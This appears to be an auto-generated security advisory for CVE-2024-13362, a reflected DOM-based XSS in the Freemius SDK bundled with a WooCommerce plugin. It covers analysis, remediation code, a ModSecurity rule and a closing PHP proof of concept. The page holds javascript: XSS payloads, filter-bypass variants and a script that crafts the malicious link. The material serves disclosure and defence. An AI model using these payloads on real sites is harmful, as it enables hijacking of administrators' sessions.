Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 8, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (remove-add-to-cart-woocommerce)

Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 1.4.7 (Remove Add to Cart WooCommerce plugin, bundling Freemius SDK <= 2.10.1)
Patched Version
Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a reflected, DOM-based Cross-Site Scripting (XSS) flaw in the Freemius SDK (versions <= 2.10.1), a licensing and analytics library bundled inside many WordPress plugins and themes; the affected product named in this record is the "Remove Add to Cart WooCommerce" plugin (version 1.4.7). "DOM-based" means the 'url' parameter is consumed by the SDK's own JavaScript in the browser rather than echoed by PHP, so the injected script runs in the victim's browser when they open a crafted link; no authentication is required to craft that link. The CVSS v3.1 score is 6.1 (Medium): network attack vector, low complexity, no privileges required, user interaction required (a click), changed scope, and low confidentiality and integrity impact, the standard vector for reflected XSS.

Root Cause: Based on the CWE-79 classification and the "DOM-based" qualifier, the root cause is improper neutralization of the 'url' parameter before it reaches a client-side sink. Inferred from the framework context (this analysis is metadata-based, not drawn from a patch diff), the Freemius SDK's JavaScript likely reads 'url' from the page location (query string or fragment) and passes it to a navigation or HTML sink such as location.href, window.open, an anchor's href, document.write or innerHTML without validating the scheme or escaping the value. Atomic Edge analysis concludes that the SDK fails to sanitize or escape the 'url' parameter before using it in DOM manipulation routines. Because the sink is client-side, server-side PHP escaping alone would not close the issue, and the same code is reachable from every plugin or theme that bundles the SDK.

Exploitation: An unauthenticated attacker builds a link whose 'url' parameter carries script, for example `?url=javascript:alert(document.cookie)`, pointing at a page that loads the Freemius SDK (e.g., "/?freemius_action=some_action&url=…") or at a plugin endpoint that consumes the parameter. Which payload works depends on the sink: a `javascript:` URL only fires when the value is assigned to a navigation sink (location.href, window.open, a clicked anchor href), whereas an innerHTML or document.write sink needs markup carrying an event handler instead. When the victim opens the link, the script runs in the origin of the vulnerable WordPress site with whatever session the victim holds there. No authentication is needed to craft the link, but a click is required, so delivery is by phishing (email, chat, a link placed on a third-party page), and the valuable target is a logged-in administrator.

Remediation: Because the sink is in client-side JavaScript, the fix belongs there: parse the value with the URL constructor, accept only the http and https schemes (rejecting javascript:, data: and vbscript:), and preferably restrict redirect targets to the site's own origin or to relative paths. A prefix check on the raw string is not enough, since browsers ignore case and strip tabs and newlines inside the scheme before navigating. Where the SDK's PHP side also handles the value, Atomic Edge research recommends WordPress's built-in functions: `esc_url_raw()` when storing or forwarding it, `esc_url()` when printing it into HTML, `wp_json_encode()` rather than string concatenation when embedding it in inline JavaScript (`esc_js()` only escapes for a quoted JS string and does not neutralize a javascript: scheme), and `wp_safe_redirect()` / `wp_validate_redirect()` for server-side redirects. A Content-Security-Policy whose script-src omits 'unsafe-inline' additionally blocks javascript: URL navigation and inline handlers, which limits the damage where a sink is missed.
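The sink pattern and the two levels of fix described above, as an added example that is not Freemius or plugin code. The page origin, query strings and payloads are constructed for the demonstration, and the "vulnerable" function is an assumed shape of the flaw, not the SDK's actual routine. It runs under Node.js, whose URL class applies the same WHATWG normalisation a browser does before choosing a scheme.

```javascript
// Added example (not Freemius or plugin code): the client-side sink pattern
// the advisory infers, a naive string blocklist that does not hold, and a
// scheme/origin allowlist that does. Origin, queries and payloads are
// constructed for this example. Runs under Node.js, no browser needed.

// Assumed vulnerable pattern: take `url` from the query string and hand it to
// a navigation sink (location.href / anchor href) without validation.
function vulnerableRedirectTarget(search) {
  return new URLSearchParams(search).get("url"); // would go to location.href as-is
}

// Naive "fix": string-prefix blocklist. It misses case variants and the
// leading or embedded tabs/newlines the browser strips before it interprets
// the scheme, so those payloads still execute.
function naiveIsSafe(raw) {
  return typeof raw === "string" &&
    !raw.startsWith("javascript:") && !raw.startsWith("data:") && !raw.startsWith("vbscript:");
}

// Hardened check: normalise with the WHATWG URL parser (strips tabs/newlines,
// lowercases the scheme), then allow only http(s) on the page's own origin.
// Relative paths resolve against that origin and are therefore accepted.
function isSafeRedirect(raw, pageOrigin) {
  if (typeof raw !== "string" || raw.trim() === "") return false;
  let parsed;
  try {
    parsed = new URL(raw, pageOrigin);
  } catch {
    return false; // unparseable input is rejected, never passed through
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return false;
  return parsed.origin === pageOrigin;
}

// Drop-in replacement for the vulnerable function: a validated absolute
// target or a fixed fallback, never the raw parameter.
function safeRedirectTarget(search, pageOrigin) {
  const raw = new URLSearchParams(search).get("url");
  return isSafeRedirect(raw, pageOrigin) ? new URL(raw, pageOrigin).href : pageOrigin + "/";
}

// Constructed inputs: the decoded value of ?url=... and whether it should pass.
const PAGE_ORIGIN = "https://shop.example";
const CASES = [
  ["javascript:alert(document.cookie)", false],
  ["JavaScript:alert(1)", false],          // case variant slips past a blocklist
  ["\njavascript:alert(1)", false],        // leading newline, browser strips it
  ["java\tscript:alert(1)", false],        // embedded tab, browser strips it
  ["data:text/html,<script>alert(1)</script>", false],
  ["vbscript:MsgBox(1)", false],
  ["//evil.example/phish", false],         // protocol-relative, foreign origin
  ["https://evil.example/phish", false],
  ["/checkout?step=2", true],              // same-origin relative path
  ["https://shop.example:443/cart", true], // default port normalises away
];

function report() {
  return CASES.map(([raw, expected]) => ({
    raw,
    naive: naiveIsSafe(raw),
    hardened: isSafeRedirect(raw, PAGE_ORIGIN),
    expected,
  }));
}

for (const r of report()) {
  console.log(`${JSON.stringify(r.raw).padEnd(44)} naive=${r.naive}  hardened=${r.hardened}`);
}
```

The table printed by the loop shows the blocklist passing the case-folded, newline-prefixed and tab-split payloads while the parser-based check rejects all three and still accepts the two legitimate same-origin targets.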

Impact: Successful exploitation gives the attacker script execution in the victim's browser on the vulnerable site's origin. The flaw is reflected, not stored: nothing persists server-side and each victim has to be sent the link. WordPress sets its authentication cookies HttpOnly, so outright cookie theft is not the realistic outcome; instead the injected script rides the victim's logged-in session, for example creating an administrator account, changing settings or installing a plugin through wp-admin or the REST API with a nonce read from the page, as well as redirecting to malicious sites or defacing what the victim sees. Because no authentication is needed to trigger the flaw, campaigns that phish site administrators can end in full site takeover. The impact is confined to the browser session (no direct server-side code execution), but the SDK is bundled in many plugins and themes, so the population of vulnerable sites is far larger than the one plugin named here.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Target: block a url parameter that carries a script-executing scheme on any request
# to the site. The described attack is a victim clicking a crafted link (a GET), so the
# rule is not limited to POSTed admin-ajax.php actions. ModSecurity has already
# URL-decoded ARGS once: urlDecodeUni catches double-encoding, removeWhitespace strips
# the tabs/newlines browsers ignore inside "java<TAB>script:", lowercase folds case.
# Caveat: a payload carried in the URL fragment (#...) never reaches the server, so a
# purely DOM-based sink that reads location.hash cannot be covered by any WAF rule.
SecRule ARGS:url "@rx ^(javascript|data|vbscript):" \
  "id:20261994,phase:2,deny,status:403,\
  t:none,t:urlDecodeUni,t:removeWhitespace,t:lowercase,\
  msg:'CVE-2024-13362 Freemius Reflected XSS via url param',severity:'CRITICAL',tag:'CVE-2024-13362'"
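An added offline model of what such a rule actually evaluates, written for this page and not part of the Atomic Edge rule set. It reproduces ModSecurity's behaviour of handing ARGS to a rule already URL-decoded once, then applies a named transformation chain and the same regex. Two chains are compared: a minimal one (t:lowercase,t:urlDecode only) and one that also applies t:urlDecodeUni and t:removeWhitespace. The request lines are constructed; the %uXXXX handling of urlDecodeUni is omitted because none of the inputs use it.

```javascript
// Added example, not Atomic Edge rule code: a small model of what a ModSecurity
// rule on ARGS:url sees, so a transformation chain can be checked against the
// encodings attackers actually use. ModSecurity decodes ARGS once before the
// rule runs; the listed t: functions then run in order and the regex is
// evaluated on the result. All request lines below are constructed.

const SCHEME_RE = /^(javascript|data|vbscript):/;

// One URL-decode pass. Malformed %xx sequences are left in place, as
// ModSecurity's urlDecode does, and '+' becomes a space.
function urlDecodeOnce(s) {
  return s.replace(/\+/g, " ")
          .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// The server never receives the fragment, so it is dropped before parsing.
// That is exactly the WAF blind spot for hash-driven DOM XSS.
function serverSideArgs(requestUri) {
  const query = requestUri.split("#")[0].split("?").slice(1).join("?");
  const args = {};
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const key = eq < 0 ? pair : pair.slice(0, eq);
    const val = eq < 0 ? "" : pair.slice(eq + 1);
    args[urlDecodeOnce(key)] = urlDecodeOnce(val);
  }
  return args;
}

// Models of the ModSecurity transformation functions used by the two chains
// (urlDecodeUni's %uXXXX support is omitted; no input here needs it).
const TRANSFORMS = {
  urlDecode: urlDecodeOnce,
  urlDecodeUni: urlDecodeOnce,
  lowercase: (s) => s.toLowerCase(),
  removeWhitespace: (s) => s.replace(/\s+/g, ""),
};

// True when the rule would fire: url arg present, transformed, regex matches.
function ruleMatches(requestUri, chain) {
  const url = serverSideArgs(requestUri).url;
  if (url === undefined) return false;
  const normalised = chain.reduce((acc, name) => TRANSFORMS[name](acc), url);
  return SCHEME_RE.test(normalised);
}

const MINIMAL_CHAIN = ["lowercase", "urlDecode"];
const FULL_CHAIN = ["urlDecodeUni", "removeWhitespace", "lowercase"];
const blockedByMinimal = (uri) => ruleMatches(uri, MINIMAL_CHAIN);
const blockedByFull = (uri) => ruleMatches(uri, FULL_CHAIN);

// Constructed requests: plain, case-folded, double-encoded, whitespace-split,
// and fragment-carried payloads.
const REQUESTS = [
  "/wp-admin/admin-ajax.php?action=x&url=javascript:alert(1)",
  "/?url=JaVaScRiPt:alert(1)",
  "/?url=%256Aavascript:alert(1)", // %25 -> %, so the second decode yields javascript:
  "/?url=%09javascript:alert(1)",  // leading tab: the browser strips it, a minimal chain does not
  "/?url=java%0Ascript:alert(1)",  // newline inside the scheme, same effect
  "/#url=javascript:alert(1)",     // fragment: never sent to the server
];

function compare() {
  return REQUESTS.map((uri) => ({ uri, minimal: blockedByMinimal(uri), full: blockedByFull(uri) }));
}

for (const r of compare()) {
  console.log(`${r.uri.padEnd(54)} minimal=${r.minimal}  full=${r.full}`);
}
```

Running it shows the minimal chain letting the tab- and newline-carrying payloads through, both chains catching the double-encoded one, and neither seeing the fragment-carried one at all, which is why the remediation has to be in the SDK's JavaScript and the WAF rule is only a stopgap.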

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Assumptions:
// - The vulnerable endpoint is a page or handler of a WordPress plugin that bundles the Freemius SDK.
// - The 'url' parameter is consumed without sanitization, most likely by client-side JavaScript.
// - The endpoint and action name below are placeholders, not confirmed Freemius routes; adjust them.

// Configuration
$target_url = 'http://example.com';        // Replace with the authorized target WordPress site URL
$endpoint   = '/wp-admin/admin-ajax.php';  // Common AJAX handler; adjust based on plugin
$action     = 'freemius_checkout';         // Placeholder action name (assumption)

// Payload: JavaScript alert to demonstrate XSS. A javascript: URL only fires in a
// navigation sink (location.href, anchor href); an innerHTML sink would need markup instead.
$payload = 'javascript:alert(document.cookie)';

// Construct the crafted link the victim would be lured into clicking
$malicious_url = $target_url . $endpoint . '?action=' . rawurlencode($action) . '&url=' . rawurlencode($payload);

echo "[+] Crafted link: $malicious_url\n";

// Fetching the link from a script cannot trigger DOM-based XSS (there is no JavaScript
// engine here); it only shows whether the server returns the value verbatim. Open the
// link in a browser against a lab instance to confirm execution.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);

$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error     = curl_error($ch);
curl_close($ch);

if ($response === false) {
    echo "[-] Request failed: $error\n";
    exit(1);
}

echo "[+] HTTP Response Code: $http_code\n";
if (strpos($response, $payload) !== false) {
    echo "[+] Payload reflected verbatim in the response body (server-side reflection)\n";
} else {
    echo "[*] Payload not reflected by the server; a DOM-based sink would read it client-side\n";
}
?>
